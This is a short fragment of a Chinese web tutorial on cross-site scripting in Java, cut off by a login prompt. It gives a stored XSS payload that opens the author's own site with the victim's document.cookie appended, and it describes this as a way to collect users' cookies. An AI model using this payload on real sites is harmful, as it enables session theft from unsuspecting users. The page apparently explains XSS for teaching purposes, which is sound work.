阅读背景:

Java xss攻击(跨站脚本攻击)

来源:互联网 
我们直接输入<script>window.open(“www.jwdstef.com?param=”+document.cookie)</script>,当用户查看这个页面的时候,就会请求www.jwdstef.com这个站点,这个站点是我自己搭建的专门用来收集用户cookie的,这样我就盗取了用户的cookie。我们直接输入<script>window.open(“www.jwdstef.com?param=”


你的当前访问异常,请进行认证后继续阅读剩余内容。

分享到: